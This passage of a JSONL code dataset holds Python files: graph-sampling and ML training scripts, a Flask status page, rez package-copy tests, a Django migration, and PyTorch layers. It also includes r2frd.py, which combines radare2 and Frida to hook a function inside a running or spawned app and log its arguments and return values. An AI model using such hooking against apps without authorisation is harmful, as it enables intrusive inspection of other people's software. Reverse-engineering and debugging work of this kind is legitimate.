dataframe.\n\n \"\"\"\n log = logging.getLogger(__name__)\n\n # Randomly shuffle the sample and fix formatting\n df = df.sample(frac=1)\n df = df.rename(columns={\"nodes\": \"edge\"})\n df.edge = [literal_eval(x) for x in df.edge]\n df.edge = [(str(u), str(v)) for u, v in df.edge]\n\n # Remove test edges\n df[\"test\"] = df.edge.apply(lambda x: x in test)\n if any(df[\"test\"]):\n log.warning(\n red(\"Dropping {} test edge(s) from sample.\").format(sum(df[\"test\"]))\n )\n df = df[df.test == False]\n\n # Drop duplicates\n df_nodups = df.drop_duplicates()\n n_dups = len(df) - len(df_nodups)\n if n_dups > 0:\n log.warning(red(\"Dropping {} duplicate(s) from sample.\").format(n_dups))\n df = df_nodups\n\n # Check for self loops\n df[\"self_loop\"] = df.edge.apply(self_loop)\n n_loops = sum(df.self_loop)\n if n_loops:\n log.warning(red(\"Dropping {} self-loop(s) from sample.\").format(n_loops))\n df = df[df.self_loop == 0]\n df = df.drop(\"self_loop\", axis=1)\n\n return df[[\"edge\", \"label\"]]\n\n\ndef split_sample(sample: pd.DataFrame, parameters: dict) -> list:\n \"\"\"Splits sample data into training and validation sets.\n\n Args:\n sample: Pandas dataframe containing sample edges and class labels.\n\n Returns:\n A list containing split data.\n\n \"\"\"\n if parameters[\"setup\"][\"train_size\"]:\n return train_test_split(sample, train_size=parameters[\"setup\"][\"train_size\"])\n elif parameters[\"setup\"][\"valid_size\"]:\n return train_test_split(sample, test_size=parameters[\"setup\"][\"valid_size\"])\n\n\ndef extract_classes(classes: pd.DataFrame) -> 
dict:\n \"\"\"Extracts edges and class labels from labelled training data.\n\n Args:\n classes: Pandas dataframe with two columns:\n edge: the edge as a tuple in the form (source, sink).\n valid: a binary variable taking the value 1 if the edge was hidden and 0\n if it was fake.\n\n Returns:\n A dictionary containing lists for the edges and class labels.\n \"\"\"\n return dict(edges=list(classes.edge), classes=classes.label)\n","repo_name":"thomas-duke/twitter-network","sub_path":"src/twitter_network/nodes/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":8389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1961862111","text":"import logging\nimport babel.dates\nimport datetime\n\nfrom isserviceup.config import config\nfrom flask import Flask, jsonify, render_template\nfrom flask_cors import CORS, cross_origin\nfrom raven.contrib.flask import Sentry\nimport redis\n\nfrom isserviceup.services.models.service import Status\n\napp = Flask(__name__, static_url_path='', static_folder='static')\napp.config.from_object(config)\nCORS(app)\napp.debug = config.DEBUG\n\nif config.SENTRY_DSN:\n sentry = Sentry(app, logging=True, level=logging.ERROR)\n\nrclient = redis.from_url(config.REDIS_URL, charset=\"utf-8\", decode_responses=True)\n\n\n@app.template_filter('timedelta')\ndef format_timedelta(value):\n now = datetime.datetime.now()\n return babel.dates.format_timedelta(value - now, add_direction=True)\n\n\n@app.route('/', methods=['GET'])\ndef get_index():\n services = config.SERVICES\n\n status_values = {\n Status.ok.name: ('Operational', 'fa-check', 'green'),\n Status.minor.name: ('Degraded Performance', 'fa-minus-square', 'yellow'),\n Status.major.name: ('Partial Outage', 'fa-exclamation-triangle', 'orange'),\n Status.critical.name: ('Major Outage', 'fa-times', 'red'),\n Status.maintenance.name: ('Maintenance', 'fa-wrench', 'blue'),\n Status.unavailable.name: ('Status Unavailable', 'fa-question', 'gray')\n }\n\n pipe = rclient.pipeline()\n for service in services:\n pipe.hgetall('service:{}'.format(service.name))\n pipe.get('services:last_update')\n values = pipe.execute()\n\n data = []\n for i, service in enumerate(services):\n if not values[i]:\n status = Status.unavailable.name\n last_service_update = ''\n else:\n status = values[i]['status']\n last_service_update = float(values[i]['last_update'])\n s = {\n 'name': service.name,\n 'status_page_url': service.status_url,\n 'icon_url': service.icon_url,\n 'status': status_values[status][0],\n 'last_update': last_service_update,\n 'status_icon': status_values[status][1],\n 'status_color': status_values[status][2],\n }\n data.append(s)\n\n last_update = float(values[-1]) if values[-1] else 0\n last_update = datetime.datetime.fromtimestamp(last_update)\n return render_template('index.html', services=data, last_update=last_update)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8000)\n","repo_name":"GregBorrelly/is-service-up","sub_path":"isserviceup/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"43884298914","text":"import shutil\nimport time\nimport os.path\nimport os\n\nfrom rez.system import system\nfrom rez.build_process import create_build_process\nfrom rez.build_system import create_build_system\nfrom rez.resolved_context import ResolvedContext\nfrom rez.packages import get_latest_package\nfrom rez.package_copy import 
copy_package\nfrom rez.version import VersionRange\nfrom rez.tests.util import TestBase, TempdirMixin\n\n\nclass TestCopyPackage(TestBase, TempdirMixin):\n @classmethod\n def setUpClass(cls):\n TempdirMixin.setUpClass()\n\n packages_path = cls.data_path(\"builds\", \"packages\")\n cls.src_root = os.path.join(cls.root, \"src\", \"packages\")\n cls.install_root = os.path.join(cls.root, \"packages\")\n shutil.copytree(packages_path, cls.src_root)\n\n # repo we will copy packages into\n cls.dest_install_root = os.path.join(cls.root, \"dest_packages\")\n\n # include modules\n pypath = cls.data_path(\"python\", \"late_bind\")\n\n cls.settings = dict(\n packages_path=[cls.install_root],\n package_filter=None,\n package_definition_python_path=pypath,\n resolve_caching=False,\n warn_untimestamped=False,\n warn_old_commands=False,\n implicit_packages=[])\n\n @classmethod\n def tearDownClass(cls):\n TempdirMixin.tearDownClass()\n\n def setup_once(self):\n # build packages used by this test\n self._build_package(\"build_util\", \"1\")\n self._build_package(\"floob\")\n self._build_package(\"foo\", \"1.0.0\")\n self._build_package(\"foo\", \"1.1.0\")\n self._build_package(\"bah\", \"2.1\")\n\n @classmethod\n def _create_builder(cls, working_dir):\n buildsys = create_build_system(working_dir)\n return create_build_process(process_type=\"local\",\n working_dir=working_dir,\n build_system=buildsys)\n\n @classmethod\n def _build_package(cls, name, version=None):\n # create the builder\n working_dir = os.path.join(cls.src_root, name)\n if version:\n working_dir = os.path.join(working_dir, version)\n builder = cls._create_builder(working_dir)\n\n builder.build(install_path=cls.install_root, install=True, clean=True)\n\n def _reset_dest_repository(self):\n system.clear_caches()\n if os.path.exists(self.dest_install_root):\n shutil.rmtree(self.dest_install_root)\n\n os.makedirs(self.dest_install_root)\n\n def _get_src_pkg(self, name, version):\n return get_latest_package(\n name,\n range_=VersionRange(\"==\" + version),\n paths=[self.install_root],\n error=True\n )\n\n def _get_dest_pkg(self, name, version):\n return get_latest_package(\n name,\n range_=VersionRange(\"==\" + version),\n paths=[self.dest_install_root],\n error=True\n )\n\n def _assert_copied(self, result, copied, skipped):\n self.assertEqual(len(result[\"copied\"]), copied)\n self.assertEqual(len(result[\"skipped\"]), skipped)\n\n def test_1(self):\n \"\"\"Simple package copy, no variants, no overwrite.\"\"\"\n self._reset_dest_repository()\n\n # make a copy of a package\n src_pkg = self._get_src_pkg(\"floob\", \"1.2.0\")\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root\n )\n\n self._assert_copied(result, 1, 0)\n\n # check the copied package exists and matches\n dest_pkg = self._get_dest_pkg(\"floob\", \"1.2.0\")\n result_variant = result[\"copied\"][0][1]\n dest_variant = next(dest_pkg.iter_variants())\n self.assertEqual(dest_variant.handle, result_variant.handle)\n\n pyfile = os.path.join(dest_pkg.base, \"python\", \"floob\", \"__init__.py\")\n ctime = os.stat(pyfile).st_ctime\n\n # copy again but with overwrite=False; should do nothing\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root\n )\n\n self._assert_copied(result, 0, 1)\n\n # check that package payload wasn't overwritten\n self.assertEqual(os.stat(pyfile).st_ctime, ctime)\n\n def test_2(self):\n \"\"\"Package copy, no variants, overwrite.\"\"\"\n self._reset_dest_repository()\n\n # make a copy of a package\n src_pkg 
= self._get_src_pkg(\"floob\", \"1.2.0\")\n copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root\n )\n\n dest_pkg = self._get_dest_pkg(\"floob\", \"1.2.0\")\n\n pyfile = os.path.join(dest_pkg.base, \"python\", \"floob\", \"__init__.py\")\n ctime = os.stat(pyfile).st_ctime\n\n # overwrite same package copy\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n overwrite=True\n )\n\n self._assert_copied(result, 1, 0)\n\n # check that package payload was overwritten\n self.assertNotEqual(os.stat(pyfile).st_ctime, ctime)\n\n def test_3(self):\n \"\"\"Package copy, variants, overwrite and non-overwrite.\"\"\"\n self._reset_dest_repository()\n\n # make a copy of a varianted package\n src_pkg = self._get_src_pkg(\"bah\", \"2.1\")\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root\n )\n\n self._assert_copied(result, 2, 0) # 2 variants\n\n # check the copied variants exist and match\n dest_pkg = self._get_dest_pkg(\"bah\", \"2.1\")\n ctimes = []\n\n for index in (0, 1):\n result_variant = result[\"copied\"][index][1]\n dest_variant = dest_pkg.get_variant(index)\n self.assertEqual(dest_variant.handle, result_variant.handle)\n\n pyfile = os.path.join(dest_variant.root, \"python\", \"bah\", \"__init__.py\")\n ctime = os.stat(pyfile).st_ctime\n ctimes.append(ctime)\n\n # copy variant with no overwrite, should do nothing\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n variants=[1]\n )\n\n self._assert_copied(result, 0, 1)\n\n # copy variant with overwrite\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n variants=[1],\n overwrite=True\n )\n\n self._assert_copied(result, 1, 0)\n\n # check copied variant is the one we expect\n dest_pkg = self._get_dest_pkg(\"bah\", \"2.1\")\n result_variant = result[\"copied\"][0][1]\n dest_variant = dest_pkg.get_variant(1)\n self.assertEqual(dest_variant.handle, result_variant.handle)\n\n # check copied variant payload was overwritten\n pyfile = os.path.join(dest_variant.root, \"python\", \"bah\", \"__init__.py\")\n self.assertNotEqual(os.stat(pyfile).st_ctime, ctimes[1])\n\n # check non-copied variant payload was not written\n skipped_variant = dest_pkg.get_variant(0)\n pyfile = os.path.join(skipped_variant.root, \"python\", \"bah\", \"__init__.py\")\n self.assertEqual(os.stat(pyfile).st_ctime, ctimes[0])\n\n def test_4(self):\n \"\"\"Package copy with rename, reversion.\"\"\"\n self._reset_dest_repository()\n\n # copy a package to a different name and version\n src_pkg = self._get_src_pkg(\"floob\", \"1.2.0\")\n result = copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n dest_name=\"flaab\",\n dest_version=\"5.4.1\"\n )\n\n self._assert_copied(result, 1, 0)\n\n # check copied variant is the one we expect\n dest_pkg = self._get_dest_pkg(\"flaab\", \"5.4.1\")\n result_variant = result[\"copied\"][0][1]\n dest_variant = next(dest_pkg.iter_variants())\n self.assertEqual(dest_variant.handle, result_variant.handle)\n\n def test_5(self):\n \"\"\"Package copy with standard, new timestamp.\"\"\"\n self._reset_dest_repository()\n\n # wait 1 second to guarantee newer timestamp in copied pkg\n time.sleep(1)\n\n # copy package and overwrite timestamp\n src_pkg = self._get_src_pkg(\"floob\", \"1.2.0\")\n copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root\n )\n\n # check copied variant contains expected timestamp\n dest_pkg = self._get_dest_pkg(\"floob\", \"1.2.0\")\n 
self.assertTrue(dest_pkg.timestamp > src_pkg.timestamp)\n\n def test_6(self):\n \"\"\"Package copy with keep_timestamp.\"\"\"\n self._reset_dest_repository()\n\n # wait 1 second to ensure we don't just accidentally get same timestamp\n time.sleep(1)\n\n # copy package and overwrite timestamp\n src_pkg = self._get_src_pkg(\"floob\", \"1.2.0\")\n copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n keep_timestamp=True\n )\n\n # check copied variant contains expected timestamp\n dest_pkg = self._get_dest_pkg(\"floob\", \"1.2.0\")\n self.assertEqual(dest_pkg.timestamp, src_pkg.timestamp)\n\n def test_7(self):\n \"\"\"Package copy with overrides.\"\"\"\n self._reset_dest_repository()\n\n overrides = {\n \"timestamp\": 10000,\n \"description\": \"this is a copy\",\n \"some_extra_key\": True\n }\n\n # copy package and overwrite timestamp\n src_pkg = self._get_src_pkg(\"floob\", \"1.2.0\")\n copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n overrides=overrides\n )\n\n # check copied variant contains expected timestamp\n dest_pkg = self._get_dest_pkg(\"floob\", \"1.2.0\")\n\n for k, v in list(overrides.items()):\n self.assertEqual(getattr(dest_pkg, k), v)\n\n def test_8(self):\n \"\"\"Ensure that include modules are copied.\"\"\"\n self._reset_dest_repository()\n\n src_pkg = self._get_src_pkg(\"foo\", \"1.1.0\")\n copy_package(\n package=src_pkg,\n dest_repository=self.dest_install_root,\n )\n\n dest_pkg = self._get_dest_pkg(\"foo\", \"1.1.0\")\n dest_variant = next(dest_pkg.iter_variants())\n\n # do a resolve\n ctxt = ResolvedContext(\n [\"foo==1.1.0\"],\n package_paths=[self.dest_install_root, self.install_root]\n )\n\n resolved_variant = ctxt.get_resolved_package(\"foo\")\n self.assertEqual(dest_variant.handle, resolved_variant.handle)\n\n # this can only match if the include module was copied with the package\n environ = ctxt.get_environ(parent_environ={})\n self.assertEqual(environ.get(\"EEK\"), \"2\")\n","repo_name":"AcademySoftwareFoundation/rez","sub_path":"src/rez/tests/test_copy_package.py","file_name":"test_copy_package.py","file_ext":"py","file_size_in_byte":10779,"program_lang":"python","lang":"en","doc_type":"code","stars":844,"dataset":"github-code","pt":"79"} +{"seq_id":"49527822","text":"import numpy as np\nimport tensorflow as tf\nimport gym\nimport time\nimport argparse\nimport sys\n\nfrom replay_buffer import *\nfrom ac import *\nfrom gym_torcs import TorcsEnv\n\n#-----------------------------------------------------------------------------------------------\n\ndef sac_fn(args):\n\n sess = tf.Session()\n \n sac = SAC(sess, args) \n \n saver = tf.train.Saver()\n\n sac.init_all_vars()\n sac.target_init()\n \n if (args.train_test == 0):\n print('train model ')\n train_sac(sess, args, sac, saver)\n elif (args.train_test == 1):\n print('test model ')\n test_sac(sess, args, sac, saver)\n else:\n print('wrong entry for train_test: ', args.train_test) \n sys.exit()\n\n#-------------------------------------------------------------------------------\n\ndef train_sac(sess, args, sac, saver):\n\n env = TorcsEnv(vision=False, throttle=True, gear_change=False)\n \n replay_buffer = ReplayBuffer(args.s_dim, args.a_dim, args.buff_size)\n\n for ep in range(args.total_ep):\n\n if np.mod(ep, 100) == 0:\n ob = env.reset(relaunch=True) #relaunch TORCS every N episode because of the memory leak error\n else:\n ob = env.reset()\n\n s = np.hstack((ob.angle, ob.track, ob.trackPos, ob.speedX, ob.speedY, ob.speedZ, ob.wheelSpinVel/100.0, ob.rpm))\n\n\n 
done = False \n ep_rew = 0.0\n ep_len = 0 \n\n while (not done):\n\n # first 10 episodes, just step on gas, drive straight\n if (ep > 10):\n a = sac.get_action(s)\n else:\n a = np.array([0.0, 1.0, 0.0])\n\n\n ob, r, done, _ = env.step(a)\n s2 = np.hstack((ob.angle, ob.track, ob.trackPos, ob.speedX, ob.speedY, ob.speedZ, ob.wheelSpinVel/100.0, ob.rpm)) \n\n ep_rew += r\n ep_len += 1\n\n if (ep_len >= args.max_ep_len):\n done = True\n\n replay_buffer.store(s, a, r, s2, float(done))\n\n s = s2\n\n batch = replay_buffer.sample_batch(args.batch_size)\n outs = sac.train(batch)\n\n \n print('episode: ', ep, ' | episode rewards: ', round(ep_rew,4), ' | episode length: ', ep_len, ' | alpha/temperature: ', outs[9]) \n with open(\"performance.txt\", \"a\") as myfile:\n myfile.write(str(ep) + \" \" + str(ep_len) + \" \" + str(round(ep_rew,4)) + \" \" + str(round(outs[9],4)) + \"\\n\") \n\n if (ep % 10 == 0):\n # save model \n saver.save(sess, 'ckpt/model') \n\n#------------------------------------------------------------------------------- \n\ndef test_sac(sess, args, sac, saver):\n\n saver.restore(sess, 'ckpt/model')\n \n env = TorcsEnv(vision=False, throttle=True, gear_change=False)\n\n ob = env.reset(relaunch=True) #relaunch TORCS every N episode because of the memory leak error\n \n s = np.hstack((ob.angle, ob.track, ob.trackPos, ob.speedX, ob.speedY, ob.speedZ, ob.wheelSpinVel/100.0, ob.rpm))\n \n done = False \n ep_rew = 0.0\n ep_len = 0 \n\n while (not done):\n \n # deterministic actions at test time\n a = sac.get_action(s, True) \n \n ob, r, done, _ = env.step(a)\n s = np.hstack((ob.angle, ob.track, ob.trackPos, ob.speedX, ob.speedY, ob.speedZ, ob.wheelSpinVel/100.0, ob.rpm))\n\n ep_rew += r\n ep_len += 1\n\n if (ep_len >= args.max_ep_len):\n done = True\n\n print('test time performance: | rewards: ', ep_rew, ' | length: ', ep_len) \n\n#------------------------------------------------------------------------------- \n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--s_dim', type=int, default=29)\n parser.add_argument('--a_dim', type=int, default=3)\n\n parser.add_argument('--gamma', type=float, default=0.99)\n parser.add_argument('--total_ep', type=int, default=2000)\n parser.add_argument('--max_ep_len', type=int, default=1000)\n parser.add_argument('--lr', type=float, default=1e-4)\n parser.add_argument('--polyak', type=float, default=0.995)\n parser.add_argument('--buff_size', type=int, default=int(5e5))\n parser.add_argument('--batch_size', type=int, default=128)\n\n # train_test = 0 for train; = 1 for test\n parser.add_argument('--train_test', type=int, default=1)\n \n args = parser.parse_args()\n\n sac_fn(args)\n","repo_name":"kaushikb258/SAC_Torcs","sub_path":"sac.py","file_name":"sac.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"33380150201","text":"import os\n\nimport cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom keras import models\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.utils.np_utils import to_categorical\nfrom sklearn.model_selection import train_test_split\n\n# Parameters\n\npath = \"myData\" # folder with all the class folders\nlabelFile = 'labels.csv' # file with all names of classes\nbatch_size_val = 50 # how many to process together\n# steps_per_epoch_val = 1000\nepochs_val = 100\nimageDimensions = (32, 32, 3)\ntestRatio = 0.2 # if 1000 images split will 200 for 
testing\nvalidationRatio = 0.2 # if 1000 images 20% of remaining 800 will be 160 for validation\n\n# Importing of the Images\ncount = 0\nimages = []\nclassNo = []\nmyList = os.listdir(path)\nprint(\"Total Classes Detected:\", len(myList))\nnoOfClasses = len(myList)\nprint(\"Importing Classes...\")\nfor x in range(0, len(myList)):\n myPicList = os.listdir(path + \"/\" + str(count))\n for y in myPicList:\n curImg = cv2.imread(path + \"/\" + str(count) + \"/\" + y)\n images.append(curImg)\n classNo.append(count)\n print(count, end=\" \")\n count += 1\nprint(\" \")\nimages = np.array(images)\nclassNo = np.array(classNo)\n\n# Split Data\nX_train, X_test, y_train, y_test = train_test_split(images, classNo, test_size=testRatio)\nX_train, X_validation, y_train, y_validation = train_test_split(X_train, y_train, test_size=validationRatio)\n\n# X_train = ARRAY OF IMAGES TO TRAIN\n# y_train = CORRESPONDING CLASS ID\n\n# TO CHECK IF NUMBER OF IMAGES MATCHES TO NUMBER OF LABELS FOR EACH DATA SET\nprint(\"Data Shapes\")\nprint(\"Train\", end=\"\")\nprint(X_train.shape, y_train.shape)\nprint(\"Validation\", end=\"\")\nprint(X_validation.shape, y_validation.shape)\nprint(\"Test\", end=\"\")\nprint(X_test.shape, y_test.shape)\nassert (X_train.shape[0] == y_train.shape[\n 0]), \"The number of images in not equal to the number of labels in training set\"\nassert (X_validation.shape[0] == y_validation.shape[\n 0]), \"The number of images in not equal to the number of labels in validation set\"\nassert (X_test.shape[0] == y_test.shape[0]), \"The number of images in not equal to the number of labels in test set\"\nassert (X_train.shape[1:] == imageDimensions), \" The dimensions of the Training images are wrong \"\nassert (X_validation.shape[1:] == imageDimensions), \" The dimensions of the Validation images are wrong \"\nassert (X_test.shape[1:] == imageDimensions), \" The dimensions of the Test images are wrong\"\n\n# READ CSV FILE\ndata = pd.read_csv(labelFile)\nprint(\"data shape \", data.shape, type(data))\n\n\n# PREPROCESSING THE IMAGES\ndef preprocessing(img):\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # CONVERT TO GRAYSCALE\n img = cv2.equalizeHist(img) # STANDARDIZE THE LIGHTING IN AN IMAGE\n img = img / 255 # TO NORMALIZE VALUES BETWEEN 0 AND 1 INSTEAD OF 0 TO 255\n return img\n\n\nX_train = np.array(list(map(preprocessing, X_train))) # TO ITERATE AND PREPROCESS ALL IMAGES\nX_validation = np.array(list(map(preprocessing, X_validation)))\nX_test = np.array(list(map(preprocessing, X_test)))\n\n# ADD A DEPTH OF 1\nX_train = X_train.reshape(X_train.shape[0], 32, 32, 1)\nX_validation = X_validation.reshape(X_validation.shape[0], 32, 32, 1)\nX_test = X_test.reshape(X_test.shape[0], 32, 32, 1)\n\n# AUGMENTATION OF IMAGES: TO MAKEIT MORE GENERIC\ndataGen = ImageDataGenerator(width_shift_range=0.1,\n # 0.1 = 10% IF MORE THAN 1 E.G 10 THEN IT REFERS TO NO. OF PIXELS EG 10 PIXELS\n height_shift_range=0.1,\n zoom_range=0.2, # 0.2 MEANS CAN GO FROM 0.8 TO 1.2\n shear_range=0.1, # MAGNITUDE OF SHEAR ANGLE\n rotation_range=10) # DEGREES\ndataGen.fit(X_train)\nbatches = dataGen.flow(X_train, y_train,\n batch_size=20) # REQUESTING DATA GENERATOR TO GENERATE IMAGES BATCH SIZE = NO. 
OF IMAGES CREATED EACH TIME ITS CALLED\nX_batch, y_batch = next(batches)\n\ny_train = to_categorical(y_train, noOfClasses)\ny_validation = to_categorical(y_validation, noOfClasses)\ny_test = to_categorical(y_test, noOfClasses)\n\n\n# TRAIN\nmodel = models.load_model('sign_classifier_v1.4.model')\nprint(model.summary())\nhistory = model.fit(dataGen.flow(X_train, y_train, batch_size=batch_size_val),\n epochs=epochs_val, # steps_per_epoch=steps_per_epoch_val,\n validation_data=(X_validation, y_validation), shuffle=1)\n\n# PLOT\nplt.figure(1)\nplt.plot(history.history['loss'])\nplt.plot(history.history['val_loss'])\nplt.legend(['training', 'validation'])\nplt.title('loss')\nplt.xlabel('epoch')\nplt.figure(2)\nplt.plot(history.history['accuracy'])\nplt.plot(history.history['val_accuracy'])\nplt.legend(['training', 'validation'])\nplt.title('Accuracy')\nplt.xlabel('epoch')\nplt.show()\nscore = model.evaluate(X_test, y_test, verbose=0)\nprint('Test Score:', score[0])\nprint('Test Accuracy:', score[1])\n\n# STORE THE MODEL AS A PICKLE OBJECT\nmodel.save('sign_classifier_v1.5.model')\ncv2.waitKey(0)\n","repo_name":"yashanksingh/Traffic-Sign-Recognition","sub_path":"early-testing/retraining.py","file_name":"retraining.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"23966613649","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('catalogue', '0005_setup_product_models'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='product',\n name='ordering',\n field=models.PositiveIntegerField(default=0),\n preserve_default=True,\n ),\n ]\n","repo_name":"SmallsLIVE/smallslive","sub_path":"smallslive/oscar_apps/catalogue/migrations/0006_product_ordering.py","file_name":"0006_product_ordering.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"79"} +{"seq_id":"72606741374","text":"#!/home/nitanmarcel/.pyenv/shims/python\nimport r2pipe\nimport frida\n\nimport os\n\nimport argparse\nfrom argparse import RawTextHelpFormatter\nfrom urllib.parse import urlparse\n\nUSAGE = f\"\"\"\n[spawn/attach]://[usb/local]/[appname/pid]\n\nAttach to a local pid: attach://1234\n\nSpawn a local application: attach://'App Name'\n\nSame can be used for usb devices, but using /usb/ befor the app name\n\nattach://usb/1234\n\n\"\"\"\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter)\n parser.add_argument('command', help=USAGE)\n\n args = parser.parse_args()\n\n parsed_url = urlparse(args.command)\n\n scheme = parsed_url.scheme\n netloc = parsed_url.netloc\n path = parsed_url.path\n\n if not scheme or scheme not in ['spawn', 'attach']:\n print(USAGE)\n elif not netloc:\n print(USAGE)\n else:\n _type = 'attach'\n _target = 'local'\n appname = ''\n if scheme == 'spawn':\n _type = 'spawn'\n else:\n _type = 'attach'\n if netloc not in ['usb', 'local'] or not path:\n appname = netloc\n if path:\n appname = appname + path\n elif netloc == 'usb':\n _target = 'usb'\n if scheme == 'spawn':\n _type = 'spawn'\n if path:\n appname = path[1:]\n\n return _type, _target, appname\n\n# #!pipe ./frd.py usb spawn com.openai.chatgpt\n\n\nBASE_TEMPLATE = \"\"\"\nconsole.log('LOADED')\n\nvar hooked = false\nconst library = '$(LIBRARY)'\n\nfunction doHook() {\n if (!hooked) {\n try {\n 
Module.ensureInitialized(library);\n hooked = true\n var base = Module.findBaseAddress(library)\n\n $(INTERCEPT)\n } catch (err) {\n throw err\n }\n }\n}\n\nsetInterval(doHook, 0)\n\"\"\"\n\nINTERCEPT_TEMPLATE = \"\"\"\nvar address = $(ADDRESS)\nvar target = base.add(address)\nInterceptor.attach(target, {\n onEnter: function(args) {\n this._target = target\n console.log('\\\\n', target, 'ENTER')\n console.log('----------------------------------')\n var aArgs = $(ARGS)\n aArgs.forEach((element, index) => {\n var arg = args[index]\n // Try to guess the type\n try {\n arg = args[index].toUInt32()\n } catch {\n\n }\n try {\n arg = Memory.readUtf8String(args[index])\n } catch {\n\n }\n console.log('\\\\n', 'ARG', '(' + element.name + ')', ':')\n console.log('++++++++++++++++++++++++++++++++++')\n console.log(arg)\n console.log('**********************************\\\\n')\n });\n },\n onLeave: function(retval) {\n console.log(this._target, 'LEAVE')\n var res = retval\n\n // Try to guess the type\n try {\n res = retval.toUInt32()\n } catch {\n\n }\n try {\n res = Memory.readUtf8String(retval)\n } catch {\n\n }\n console.log('++++++++++++++++++++++++++++++++++')\n console.log('RETVAL ', res)\n console.log('**********************************\\\\n')\n }\n})\n\n\"\"\"\n\n\ndef main():\n target, device, appname = parse_args()\n\n r2 = r2pipe.open()\n\n info = r2.cmdj('ij')\n library = os.path.basename(info['core']['file'])\n\n address = r2.cmd('s')\n\n args = r2.cmdj('afvj %s' % address)\n\n intercept_script = \"\"\n aargs = []\n if args:\n for arg in args['reg']:\n name, type = arg['name'], arg['type']\n aargs.append({'name': name, 'type': type})\n\n intercept_script = INTERCEPT_TEMPLATE.replace(\n '$(ADDRESS)', address).replace('$(ARGS)', str(aargs))\n\n # $(LIBRARY) $(INTERCEPT)\n script = BASE_TEMPLATE.replace('$(LIBRARY)', library).replace(\n '$(INTERCEPT)', intercept_script)\n\n if device == 'local':\n device = frida.get_local_device()\n else:\n device = frida.get_usb_device()\n\n if target == 'spawn':\n pid = device.spawn(appname)\n else:\n pid = device.attach(int(appname) if appname.isdigit() else appname)\n\n session = device.attach(pid)\n\n script = session.create_script(script)\n script.load()\n\n device.resume(pid)\n\n input('Press any key to stop : ')\n\n try:\n script.unload()\n except (KeyboardInterrupt, frida.InvalidOperationError):\n pass\n\n\nif __name__ == '__main__':\n try:\n main()\n except Exception as exc:\n print(exc.__class__.__name__, exc, sep=' : ')\n","repo_name":"nitanmarcel/r2-tools","sub_path":"r2frd/r2frd.py","file_name":"r2frd.py","file_ext":"py","file_size_in_byte":4493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"73524397374","text":"from torch import nn as nn\nfrom torch.nn import functional as F\nimport torch,time,os,random\nimport numpy as np\nfrom collections import OrderedDict\nfrom torch import nn as nn, einsum\nfrom einops import rearrange\nfrom math import floor, ceil\n\nclass MLP_old(nn.Module):\n def __init__(self, inSize, outSize, hiddenSizeList=[], dropout=0.0, name='MLP', actFunc=nn.ReLU, bn=False, outAct=False):\n super(MLP_old, self).__init__()\n self.name = name\n self.bn = nn.BatchNorm1d(inSize) if bn else None\n layers = nn.Sequential()\n for i,os in enumerate(hiddenSizeList):\n layers.add_module(str(i*2), nn.Linear(inSize, os))\n layers.add_module(str(i*2+1), actFunc())\n inSize = os\n self.hiddenLayers = layers\n self.dropout = nn.Dropout(p=dropout)\n self.out = nn.Linear(inSize, 
outSize)\n self.outAct = actFunc() if outAct else None\n def forward(self, x):\n if self.bn is not None:\n x = self.bn(x)\n x = self.hiddenLayers(x)\n x = self.out(self.dropout(x))\n if self.outAct is not None:\n x = self.outAct(x)\n return x\n\nclass TextEmbedding_old(nn.Module):\n def __init__(self, embeding, freeze=False, dropout=0.2, name='textEmbedding'):\n super(TextEmbedding_old, self).__init__()\n self.embedding = nn.Embedding.from_pretrained(torch.tensor(embeding, dtype=torch.float32), freeze=freeze)\n self.dropout = nn.Dropout(p=dropout)\n self.name = name\n def forward(self, x):\n return self.dropout(self.embedding(x))\n\nclass TextSPP(nn.Module):\n def __init__(self, size=128, name='textSpp'):\n super(TextSPP, self).__init__()\n self.name = name\n self.spp = nn.AdaptiveAvgPool1d(size)\n def forward(self, x):\n return self.spp(x)\n\nclass TextSPP2(nn.Module):\n def __init__(self, size=128, name='textSpp2'):\n super(TextSPP2, self).__init__()\n self.name = name\n self.spp1 = nn.AdaptiveMaxPool1d(size)\n self.spp2 = nn.AdaptiveAvgPool1d(size)\n def forward(self, x):\n x1 = self.spp1(x).unsqueeze(dim=3) # => batchSize × feaSize × size × 1\n x2 = self.spp2(x).unsqueeze(dim=3) # => batchSize × feaSize × size × 1\n x3 = -self.spp1(-x).unsqueeze(dim=3) # => batchSize × feaSize × size × 1\n return torch.cat([x1,x2,x3], dim=3) # => batchSize × feaSize × size × 3\n\nclass 